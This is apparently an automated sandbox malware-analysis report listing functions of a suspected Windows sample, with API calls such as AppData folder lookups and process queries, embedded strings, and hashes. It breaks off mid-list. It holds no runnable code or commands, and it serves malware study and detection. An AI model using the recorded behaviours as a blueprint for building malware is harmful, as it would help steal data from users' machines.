                                  • Instruction Fuzzy Hash: 7A411D7150875C5EDB318B64CC85FFB7BFE9B45304F1C44E9D98687242E2B19A45AF20
                                  Function 00FB8980 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 94COMMON
                                  Download Yara Rule
                                  APIs
                                  • std::_Xinvalid_argument.LIBCPMT ref: 00FB8996
                                    • Part of subcall function 00FDA1C0: std::exception::exception.LIBCMT ref: 00FDA1D5
                                    • Part of subcall function 00FDA1C0: std::exception::exception.LIBCMT ref: 00FDA1FB
                                  • std::_Xinvalid_argument.LIBCPMT ref: 00FB89CD
                                    • Part of subcall function 00FDA173: std::exception::exception.LIBCMT ref: 00FDA188
                                    • Part of subcall function 00FDA173: std::exception::exception.LIBCMT ref: 00FDA1AE
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1745459108.0000000000FB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                  • Associated: 00000000.00000002.1745447617.0000000000FB0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745459108.0000000000FE7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745459108.000000000103E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745459108.0000000001046000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745459108.000000000105F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745459108.00000000011E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745592433.00000000011FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745604410.00000000011FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745604410.0000000001380000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745604410.0000000001456000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745604410.000000000147E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745604410.0000000001488000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745604410.0000000001495000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745809416.0000000001496000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745899388.000000000162C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745912060.000000000162D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_fb0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: std::exception::exception$Xinvalid_argumentstd::_
                                  • String ID: invalid string position$string too long
                                  • API String ID: 2002836212-4289949731
                                  • Opcode ID: 3309a884cbb7277ace0100519ea0dba3531ab67121f2b65e90f1b13c5b0fd77b
                                  • Instruction ID: 8abe6abde75daea02ff480b9f27e9d9cdd7cdf414af5c03350d165b2683095ac
                                  • Opcode Fuzzy Hash: 3309a884cbb7277ace0100519ea0dba3531ab67121f2b65e90f1b13c5b0fd77b
                                  • Instruction Fuzzy Hash: AC21DB7230025097CB209A6DE840AAAF79DDBE17E1B14053FF141CB241CB75D842EBA5
                                  Function 00FB8850 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 89COMMON
                                  Download Yara Rule
                                  APIs
                                  • std::_Xinvalid_argument.LIBCPMT ref: 00FB8883
                                    • Part of subcall function 00FDA173: std::exception::exception.LIBCMT ref: 00FDA188
                                    • Part of subcall function 00FDA173: std::exception::exception.LIBCMT ref: 00FDA1AE
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1745459108.0000000000FB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                  • Associated: 00000000.00000002.1745447617.0000000000FB0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745459108.0000000000FE7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745459108.000000000103E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745459108.0000000001046000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745459108.000000000105F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745459108.00000000011E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745592433.00000000011FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745604410.00000000011FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745604410.0000000001380000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745604410.0000000001456000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745604410.000000000147E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745604410.0000000001488000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745604410.0000000001495000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745809416.0000000001496000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745899388.000000000162C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745912060.000000000162D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_fb0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: std::exception::exception$Xinvalid_argumentstd::_
                                  • String ID: vector<T> too long$yxxx$yxxx
                                  • API String ID: 2002836212-1517697755
                                  • Opcode ID: 5ccebd3e6c3c676f15eb65425c5a59c9541fd3aaf3603eaf32394b4e01bbdced
                                  • Instruction ID: 18ff276050c48f9d6a742c968d238f511ee0aa75c3f3b8382e8105d2e7d5a330
                                  • Opcode Fuzzy Hash: 5ccebd3e6c3c676f15eb65425c5a59c9541fd3aaf3603eaf32394b4e01bbdced
                                  • Instruction Fuzzy Hash: C731B7B5E005159BCB08DF59C8906ADBBB6EBC8350F188269E9159B384DB34ED01CB91
                                  Function 00FD5910 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 57COMMON
                                  Download Yara Rule
                                  APIs
                                  • std::_Xinvalid_argument.LIBCPMT ref: 00FD5922
                                    • Part of subcall function 00FDA173: std::exception::exception.LIBCMT ref: 00FDA188
                                    • Part of subcall function 00FDA173: std::exception::exception.LIBCMT ref: 00FDA1AE
                                  • std::_Xinvalid_argument.LIBCPMT ref: 00FD5935
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1745459108.0000000000FB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                  • Associated: 00000000.00000002.1745447617.0000000000FB0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745459108.0000000000FE7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745459108.000000000103E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745459108.0000000001046000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745459108.000000000105F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745459108.00000000011E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745592433.00000000011FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745604410.00000000011FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745604410.0000000001380000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745604410.0000000001456000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745604410.000000000147E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745604410.0000000001488000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745604410.0000000001495000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745809416.0000000001496000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745899388.000000000162C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745912060.000000000162D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_fb0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Xinvalid_argumentstd::_std::exception::exception
                                  • String ID: Sec-WebSocket-Version: 13$string too long
                                  • API String ID: 1928653953-3304177573
                                  • Opcode ID: 1abda032cdb4ba137140ac3a856f2b60589b706540c6af464247afb3bcde786b
                                  • Instruction ID: 10189678e0a78ea70bfcf09cfaee77ef7dfc1ee6469a0bbdaad92fa4ee1a7877
                                  • Opcode Fuzzy Hash: 1abda032cdb4ba137140ac3a856f2b60589b706540c6af464247afb3bcde786b
                                  • Instruction Fuzzy Hash: 2D115E31704A40CBD7218A2CA81071977E2ABD1B60F290A5EE09187795CB71D841EBA6
                                  Function 00FD3CC0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 55memoryCOMMON
                                  Download Yara Rule
                                  APIs
                                  • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,?,00FDA430,000000FF), ref: 00FD3D20
                                  • RtlAllocateHeap.NTDLL(00000000), ref: 00FD3D27
                                  • wsprintfA.USER32 ref: 00FD3D37
                                    • Part of subcall function 00FD71E0: lstrcpy.KERNEL32(00000000,ERROR), ref: 00FD71FE
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1745459108.0000000000FB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                  • Associated: 00000000.00000002.1745447617.0000000000FB0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745459108.0000000000FE7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745459108.000000000103E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745459108.0000000001046000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745459108.000000000105F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745459108.00000000011E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745592433.00000000011FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745604410.00000000011FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745604410.0000000001380000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745604410.0000000001456000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745604410.000000000147E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745604410.0000000001488000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745604410.0000000001495000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745809416.0000000001496000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745899388.000000000162C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745912060.000000000162D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_fb0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Heap$AllocateProcesslstrcpywsprintf
                                  • String ID: %dx%d
                                  • API String ID: 1695172769-2206825331
                                  • Opcode ID: b50228751b4fa7e309383eec41bc4935f7debfbdb76cac682add8d0b1be0f69c
                                  • Instruction ID: 0176e2fb42d06dccd889178a3376705e97628141da333505769356075746f4c8
                                  • Opcode Fuzzy Hash: b50228751b4fa7e309383eec41bc4935f7debfbdb76cac682add8d0b1be0f69c
                                  • Instruction Fuzzy Hash: EE01C071640708BBE7349BD4DC0AF6ABBADFB46B65F440125FA259B3C0D7B41940CBA2
                                  Function 00FB8710 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 43COMMON
                                  Download Yara Rule
                                  APIs
                                  • std::_Xinvalid_argument.LIBCPMT ref: 00FB8737
                                    • Part of subcall function 00FDA173: std::exception::exception.LIBCMT ref: 00FDA188
                                    • Part of subcall function 00FDA173: std::exception::exception.LIBCMT ref: 00FDA1AE
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1745459108.0000000000FB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                  • Associated: 00000000.00000002.1745447617.0000000000FB0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745459108.0000000000FE7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745459108.000000000103E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745459108.0000000001046000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745459108.000000000105F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745459108.00000000011E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745592433.00000000011FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745604410.00000000011FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745604410.0000000001380000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745604410.0000000001456000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745604410.000000000147E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745604410.0000000001488000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745604410.0000000001495000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745809416.0000000001496000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745899388.000000000162C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745912060.000000000162D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_fb0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: std::exception::exception$Xinvalid_argumentstd::_
                                  • String ID: vector<T> too long$yxxx$yxxx
                                  • API String ID: 2002836212-1517697755
                                  • Opcode ID: 52c23bb49208f03de0bb01cc12fe2d22902cf231cef71aae42ae2bb70c8ab05d
                                  • Instruction ID: ec43d4c57acc953462228f8950ee85ac8d805483d28762d1f8fffdb457fd8e72
                                  • Opcode Fuzzy Hash: 52c23bb49208f03de0bb01cc12fe2d22902cf231cef71aae42ae2bb70c8ab05d
                                  • Instruction Fuzzy Hash: 0BF06727F000220B8214A43E8D8449EA94A56E53E433AD665E81AEF299EC70EC83E9D5
                                  Function 00FCE500 Relevance: 6.2, APIs: 4, Instructions: 150stringCOMMON
                                  Download Yara Rule
                                  APIs
                                  • SHGetFolderPathA.SHELL32(00000000,0000001A,00000000,00000000,?), ref: 00FCE544
                                  • lstrcpy.KERNEL32(00000000,?), ref: 00FCE573
                                  • lstrcat.KERNEL32(?,00000000), ref: 00FCE581
                                  • lstrcat.KERNEL32(?,01B9DA70), ref: 00FCE59C
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1745459108.0000000000FB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                  • Associated: 00000000.00000002.1745447617.0000000000FB0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745459108.0000000000FE7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745459108.000000000103E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745459108.0000000001046000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745459108.000000000105F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745459108.00000000011E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745592433.00000000011FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745604410.00000000011FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745604410.0000000001380000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745604410.0000000001456000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745604410.000000000147E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745604410.0000000001488000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745604410.0000000001495000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745809416.0000000001496000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745899388.000000000162C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745912060.000000000162D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_fb0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcat$FolderPathlstrcpy
                                  • String ID:
                                  • API String ID: 818526691-0
                                  • Opcode ID: c1538ce329f38568e6320d292b2d80d7c423a612fc8f6ed36d93e9b91c53e4f5
                                  • Instruction ID: 7439b169febfcd4493a12a4dcc7a4292ac93f86842c8d40b10d027536c1006bc
                                  • Opcode Fuzzy Hash: c1538ce329f38568e6320d292b2d80d7c423a612fc8f6ed36d93e9b91c53e4f5
                                  • Instruction Fuzzy Hash: DB51AA75910108ABCB64EF94DC43EEE73BDFB88300F444469B9169B345DB749E80AFA1
                                  Function 00FD1FD0 Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 95stringCOMMON
                                  Download Yara Rule
                                  APIs
                                  Strings
                                  • 65 79 41 69 64 48 6C 77 49 6A 6F 67 49 6B 70 58 56 43 49 73 49 43 4A 68 62 47 63 69 4F 69 41 69 52 57 52 45 55 30 45 69 49 48 30, xrefs: 00FD1FDF, 00FD1FF5, 00FD20B7
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1745459108.0000000000FB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                  • Associated: 00000000.00000002.1745447617.0000000000FB0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745459108.0000000000FE7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745459108.000000000103E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745459108.0000000001046000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745459108.000000000105F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745459108.00000000011E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745592433.00000000011FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745604410.00000000011FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745604410.0000000001380000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745604410.0000000001456000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745604410.000000000147E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745604410.0000000001488000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745604410.0000000001495000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745809416.0000000001496000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745899388.000000000162C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745912060.000000000162D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_fb0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: strlen
                                  • String ID: 65 79 41 69 64 48 6C 77 49 6A 6F 67 49 6B 70 58 56 43 49 73 49 43 4A 68 62 47 63 69 4F 69 41 69 52 57 52 45 55 30 45 69 49 48 30
                                  • API String ID: 39653677-4138519520
                                  • Opcode ID: 6c99f6447d0d762a78973e2d27dc4db48be17efe73c65303cb3543046672fd2a
                                  • Instruction ID: b6ebe3596569487f5b655d6015176650168dfd83a90d6962a869b505743fe091
                                  • Opcode Fuzzy Hash: 6c99f6447d0d762a78973e2d27dc4db48be17efe73c65303cb3543046672fd2a
                                  • Instruction Fuzzy Hash: 4321E43A9102898BDB20EA35D4487DDF767EF94762F884067C8194B381E236590AF7D6
                                  Function 00FCEB70 Relevance: 6.1, APIs: 4, Instructions: 90stringCOMMON
                                  Download Yara Rule
                                  APIs
                                  • SHGetFolderPathA.SHELL32(00000000,0000001A,00000000,00000000,?), ref: 00FCEBB4
                                  • lstrcpy.KERNEL32(00000000,?), ref: 00FCEBE3
                                  • lstrcat.KERNEL32(?,00000000), ref: 00FCEBF1
                                  • lstrcat.KERNEL32(?,01B9DF98), ref: 00FCEC0C
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1745459108.0000000000FB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                  • Associated: 00000000.00000002.1745447617.0000000000FB0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745459108.0000000000FE7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745459108.000000000103E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745459108.0000000001046000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745459108.000000000105F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745459108.00000000011E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745592433.00000000011FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745604410.00000000011FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745604410.0000000001380000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745604410.0000000001456000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745604410.000000000147E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745604410.0000000001488000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745604410.0000000001495000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745809416.0000000001496000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745899388.000000000162C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745912060.000000000162D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_fb0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcat$FolderPathlstrcpy
                                  • String ID:
                                  • API String ID: 818526691-0
                                  • Opcode ID: 810f0010180eea167ec1bcc7a95da41299bd30f6c322e263b9a6cc81e73662f7
                                  • Instruction ID: 3dfb9d187cb9fceeb57e049db09764fdcb4653cc65541ee2f62566a046b600c4
                                  • Opcode Fuzzy Hash: 810f0010180eea167ec1bcc7a95da41299bd30f6c322e263b9a6cc81e73662f7
                                  • Instruction Fuzzy Hash: AB31687191011D9BCB65FFA4DC46BED77B8AF48300F144478B616AB241DB789E84AF90
                                  Function 00FD4480 Relevance: 6.0, APIs: 4, Instructions: 40stringCOMMON
                                  Download Yara Rule
                                  APIs
                                  • OpenProcess.KERNEL32(00000410,00000000), ref: 00FD4492
                                  • GetModuleFileNameExA.PSAPI(00000000,00000000,?,00000104), ref: 00FD44AD
                                  • CloseHandle.KERNEL32(00000000), ref: 00FD44B4
                                  • lstrcpy.KERNEL32(00000000,?), ref: 00FD44E7
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1745459108.0000000000FB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                  • Associated: 00000000.00000002.1745447617.0000000000FB0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745459108.0000000000FE7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745459108.000000000103E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745459108.0000000001046000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745459108.000000000105F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745459108.00000000011E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745592433.00000000011FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745604410.00000000011FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745604410.0000000001380000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745604410.0000000001456000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745604410.000000000147E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745604410.0000000001488000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745604410.0000000001495000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745809416.0000000001496000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745899388.000000000162C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745912060.000000000162D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_fb0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: CloseFileHandleModuleNameOpenProcesslstrcpy
                                  • String ID:
                                  • API String ID: 4028989146-0
                                  • Opcode ID: d28ced07ab62744ae95ee2e29b8a51179c3248df29b038c3676785edadb7ae8d
                                  • Instruction ID: f5b6dcfe71eb0a4b534132eb340d0da51669ad4fbb751ec24829f417dd8db3f5
                                  • Opcode Fuzzy Hash: d28ced07ab62744ae95ee2e29b8a51179c3248df29b038c3676785edadb7ae8d
                                  • Instruction Fuzzy Hash: D6F0C8B0D016152BE730DBF49C49BEA7AA9AB15314F0405A1EE55DB280D7B498C08B90
                                  Function 00FD8FD1 Relevance: 6.0, APIs: 4, Instructions: 34COMMONLIBRARYCODE
                                  Download Yara Rule
                                  APIs
                                  • __getptd.LIBCMT ref: 00FD8FDD
                                    • Part of subcall function 00FD87FF: __amsg_exit.LIBCMT ref: 00FD880F
                                  • __getptd.LIBCMT ref: 00FD8FF4
                                  • __amsg_exit.LIBCMT ref: 00FD9002
                                  • __updatetlocinfoEx_nolock.LIBCMT ref: 00FD9026
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1745459108.0000000000FB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                  • Associated: 00000000.00000002.1745447617.0000000000FB0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745459108.0000000000FE7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745459108.000000000103E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745459108.0000000001046000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745459108.000000000105F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745459108.00000000011E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745592433.00000000011FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745604410.00000000011FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745604410.0000000001380000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745604410.0000000001456000.00000040.00000001.01000000.00000003.sdmpDownload File
